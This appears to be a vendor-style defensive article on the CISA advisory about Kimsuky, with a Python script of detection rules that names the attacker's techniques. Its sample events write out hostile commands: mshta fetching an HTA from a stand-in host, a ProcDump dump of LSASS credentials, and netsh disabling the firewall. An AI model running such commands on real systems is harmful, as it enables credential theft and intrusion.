Most of the federal remote workforce reaches agency systems through remote access technologies such as virtual desktop infrastructure (VDI) and the Remote Desktop Protocol (RDP), and protecting those endpoints from attack is critical. On October 27, 2020, DHS’ Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and U.S. Cyber Command’s Cyber National Mission Force (CNMF) issued a joint alert (AA20-301A) describing the tactics, techniques, and procedures the North Korean advanced persistent threat group Kimsuky uses against targets worldwide to collect intelligence on topics of interest to the North Korean government.
Kimsuky’s tradecraft is recognizable: for example, it has used web hosting credentials, stolen from individuals outside its target set, to host its malicious scripts and tools. With the network perimeter now effectively borderless, federal agencies must ensure security controls are in place to counter these threats and to gain visibility into the agency network and its endpoints.
As federal agencies look to protect their networks, they should:
- Give heightened attention to alerts from anti-virus, intrusion detection systems (IDS), and other sources that map to the attack methods in this advisory, and monitor alerts tied to this actor so suspicious activity is caught early. Agencies need detection that covers the specific vectors described: execution of the BabyShark VBS malware (launched through mshta.exe), credential theft (dumping LSASS memory with ProcDump), and the configuration changes the actor makes to disable the host firewall.
- Educate users on safe browsing, phishing, and spear phishing. This is an opportunity to remind staff why security is everyone’s job: it takes only one user clicking one link to compromise a network. Use examples from the alert as well as real-world examples your agency has encountered. Recent phishing campaigns attributed to this actor have used lures such as COVID-19 and the North Korean nuclear program.
- Deploy the indicators of compromise (IOCs) from the STIX file provided with the advisory. Search for the listed filenames and services (for example, the “Remote Access Service” service name) and respond to high-fidelity indicators immediately.
- Search for the persistence mechanisms this actor uses, such as autorun entries, with an autorun enumeration capability (for example, an Autorun Program Details sensor). This is a good opportunity to baseline your environment: record the autorun entries present today so that future hunts only have to examine what changed.
- Identify and block the actor’s command and control mechanisms, such as the modified TeamViewer client it runs as netsvcs.exe, with an automated solution. This is a good opportunity to catalog authorized remote-access tools and block any that are unauthorized.
- Hunt for variations of this attack; bad actors inevitably change known signatures, especially after a public announcement such as this one.
- Block the Domain Name System (DNS) names listed in the advisory from resolving. Log and review any DNS requests for those names, since a resolution attempt from an internal host is itself a lead worth investigating.
- Use a quarantine capability to immediately revoke network access for any affected hosts.
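The hunting steps above can be expressed as a small set of detection rules and run over endpoint telemetry. The following Python block is an added example for this page, not code from the advisory, from CISA, or from any vendor product: it evaluates rules for the advisory’s named TTPs (mshta.exe launching an HTA, ProcDump against LSASS, firewall disablement, Run-key persistence, the “Remote Access Service” service and netsvcs.exe binary, and blocklisted DNS names) over constructed Sysmon-style events, then returns the hosts whose high-fidelity hits justify the quarantine step. The event field names, the rule names and fidelity tiers, the registry form of the firewall change, and the placeholder domain `c2.invalid` are all assumptions made for the example; the real IOCs come from the advisory’s STIX file.

```python
"""Hunt rules for the Kimsuky TTPs the advisory names, evaluated over
constructed Sysmon-style endpoint events.  Added example for this page;
it is not code from the advisory or from any vendor product."""
import re

# Constructed blocklist standing in for the DNS names in the advisory's STIX
# file. "c2.invalid" is a reserved test name (RFC 2606), not a real indicator.
DNS_BLOCKLIST = {"c2.invalid"}

# Assumed event schema; any field an event omits defaults to "".
FIELDS = ("host", "kind", "image", "cmdline", "target", "value", "name", "query")


def _is_mshta_hta(e):
    # BabyShark VBS/HTA stage launched through mshta.exe: flag only when an
    # .hta file or a URL is on the command line, to reduce benign noise.
    return (e["image"].lower().endswith("mshta.exe")
            and re.search(r"\.hta\b|https?://", e["cmdline"], re.I) is not None)


def _is_procdump_lsass(e):
    # ProcDump pointed at LSASS: credential theft.
    return "procdump" in e["image"].lower() and "lsass" in e["cmdline"].lower()


def _is_netsh_fw_off(e):
    # Host firewall disabled via netsh.
    return (e["image"].lower().endswith("netsh.exe")
            and re.search(r"advfirewall.*state\s+off", e["cmdline"], re.I) is not None)


def _is_registry_fw_off(e):
    # Assumed registry form of the same change (EnableFirewall set to 0 under
    # a FirewallPolicy profile key); not quoted from the advisory.
    t = e["target"].lower()
    return "firewallpolicy" in t and t.endswith("enablefirewall") and e["value"].strip() == "0"


def _is_run_key(e):
    # Persistence: an autorun entry written under a Run key.
    return r"\currentversion\run" in e["target"].lower()


def _is_teamviewer_service(e):
    # Modified TeamViewer C2: service name and binary named in the advisory.
    return (e["name"].lower() == "remote access service"
            or e["image"].lower().endswith("netsvcs.exe"))


def _is_netsvcs_process(e):
    return e["image"].lower().endswith("netsvcs.exe")


def _is_blocklisted_dns(e):
    # Resolution attempt for a blocklisted name (tolerates a trailing dot).
    return e["query"].lower().rstrip(".") in DNS_BLOCKLIST


# (rule name, fidelity, event kind, predicate). "high" findings drive the
# quarantine step; "medium" findings are hunt leads that need analyst review.
RULES = [
    ("mshta_hta_execution", "medium", "process", _is_mshta_hta),
    ("procdump_lsass", "high", "process", _is_procdump_lsass),
    ("firewall_disabled_netsh", "medium", "process", _is_netsh_fw_off),
    ("firewall_disabled_registry", "medium", "registry", _is_registry_fw_off),
    ("run_key_persistence", "medium", "registry", _is_run_key),
    ("teamviewer_c2_service", "high", "service", _is_teamviewer_service),
    ("netsvcs_process", "high", "process", _is_netsvcs_process),
    ("blocklisted_dns", "high", "dns", _is_blocklisted_dns),
]


def hunt(events):
    """Return one finding per (event, rule) match."""
    findings = []
    for raw in events:
        e = {**dict.fromkeys(FIELDS, ""), **raw}
        for name, fidelity, kind, pred in RULES:
            if e["kind"] == kind and pred(e):
                findings.append({"host": e["host"], "rule": name, "fidelity": fidelity})
    return findings


def summarize(findings):
    """Map host -> sorted list of rule names that fired on it."""
    out = {}
    for f in findings:
        out.setdefault(f["host"], set()).add(f["rule"])
    return {h: sorted(r) for h, r in out.items()}


def quarantine_candidates(findings):
    """Hosts with at least one high-fidelity hit: revoke network access now."""
    return {f["host"] for f in findings if f["fidelity"] == "high"}


# Constructed sample events, not real telemetry. WS-04 is a benign control:
# mshta.exe with no HTA argument and a firewall that is still enabled.
SAMPLE_EVENTS = [
    {"host": "WS-01", "kind": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://c2.invalid/stage.hta"},
    {"host": "WS-01", "kind": "process", "image": r"C:\Users\a\procdump64.exe",
     "cmdline": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\a\l.dmp"},
    {"host": "WS-01", "kind": "registry",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "value": r"wscript.exe //e:vbscript C:\Users\a\AppData\Roaming\update.vbs"},
    {"host": "WS-02", "kind": "process", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "WS-02", "kind": "dns", "query": "c2.invalid."},
    {"host": "WS-03", "kind": "service", "name": "Remote Access Service",
     "image": r"C:\Windows\netsvcs.exe"},
    {"host": "WS-04", "kind": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe"},
    {"host": "WS-04", "kind": "registry",
     "target": r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "value": "1"},
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for host, rules in sorted(summarize(found).items()):
        print(host, rules)
    print("quarantine:", sorted(quarantine_candidates(found)))
```

The fidelity split matters in practice: a single mshta.exe launch or a Run-key write is common enough in a large fleet that it should open an investigation, not trigger an automatic quarantine, whereas an LSASS dump, the actor’s named service, or a lookup of a known C2 domain is specific enough to act on immediately. Running the same rules over last month’s telemetry also gives the baseline the hunting step above calls for.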
Agency IT teams need tools that enforce security policy, harden the network environment, and prevent unwanted activity on endpoints by actors like Kimsuky. A solution that can detect, investigate, and respond to threats in real time minimizes the impact of a breach, isolates malware, and limits disruption. Knowing that their endpoints and the agency network are protected lets targeted individuals and organizations get back to their regular, important work.
As malicious actors find more advanced ways to infiltrate systems, agencies must be prepared even for tactics they have not yet seen. That means choosing security solutions and approaches that keep both the network and its endpoint devices protected.